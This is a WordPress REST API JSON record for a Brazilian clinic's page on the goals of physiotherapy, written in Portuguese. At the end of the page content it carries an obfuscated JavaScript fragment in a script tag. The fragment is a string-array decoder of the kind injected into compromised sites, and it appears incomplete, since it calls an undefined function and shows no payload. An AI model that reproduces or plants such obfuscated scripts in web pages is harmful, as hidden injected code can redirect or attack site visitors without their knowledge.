{"id":174,"date":"2017-04-03T19:49:31","date_gmt":"2017-04-03T19:49:31","guid":{"rendered":"http:\/\/renovamaringa.com.br\/portal\/?page_id=174"},"modified":"2019-11-14T14:38:26","modified_gmt":"2019-11-14T17:38:26","slug":"fisioterapia","status":"publish","type":"page","link":"https:\/\/renovamaringa.com.br\/portal\/fisioterapia\/","title":{"rendered":"Fisioterapia"},"content":{"rendered":"<h2 style=\"text-align: justify;\">Objetivos da Fisioterapia<\/h2>\n<p style=\"text-align: justify;\">A fisioterapia possui como objetivo a preserva\u00e7\u00e3o, manuten\u00e7\u00e3o, desenvolvimento ou restaura\u00e7\u00e3o (reabilita\u00e7\u00e3o) da integridade de \u00f3rg\u00e3os, sistemas ou fun\u00e7\u00f5es.<\/p>\n<p style=\"text-align: justify;\">Utiliza-se de conhecimento e recursos pr\u00f3prios como parte do processo terap\u00eautico nas condi\u00e7\u00f5es psico-f\u00edsico-social para promover melhoria de qualidade de vida.<\/p>\n<p style=\"text-align: justify;\">Fundamentar a\u00e7\u00f5es em mecanismos terap\u00eauticos sistematizados pelos estudos das ci\u00eancias: morfol\u00f3gicas; fisiol\u00f3gicas; patol\u00f3gicas; bioqu\u00edmica; biof\u00edsica; biomec\u00e2nica; cinesia; sinergia funcional; cinesia patologia de \u00f3rg\u00e3os e sistemas do corpo humano. Al\u00e9m das disciplinas comportamentais e sociais.<\/p>\n<p style=\"text-align: justify;\">Compete ainda ordena\u00e7\u00e3o e indu\u00e7\u00e3o do tratamento fisioterap\u00eautico no paciente, bem como, acompanhamento da evolu\u00e7\u00e3o do quadro cl\u00ednico funcional e condi\u00e7\u00f5es para alta do servi\u00e7o.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Objetivos da Fisioterapia A fisioterapia possui como objetivo a preserva\u00e7\u00e3o, manuten\u00e7\u00e3o, desenvolvimento ou restaura\u00e7\u00e3o (reabilita\u00e7\u00e3o) da integridade de \u00f3rg\u00e3os, sistemas ou fun\u00e7\u00f5es. Utiliza-se de conhecimento e recursos pr\u00f3prios como parte do processo<a class=\"moretag\" href=\"https:\/\/renovamaringa.com.br\/portal\/fisioterapia\/\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":567,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"jetpack_post_was_ever_published":false,"footnotes":""},"class_list":["post-174","page","type-page","status-publish","has-post-thumbnail","hentry"],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/P8NC8B-2O","jetpack-related-posts":[],"jetpack_likes_enabled":true,"_links":{"self":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/174","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/comments?post=174"}],"version-history":[{"count":4,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/174\/revisions"}],"predecessor-version":[{"id":327,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/174\/revisions\/327"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/media\/567"}],"wp:attachment":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/media?parent=174"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}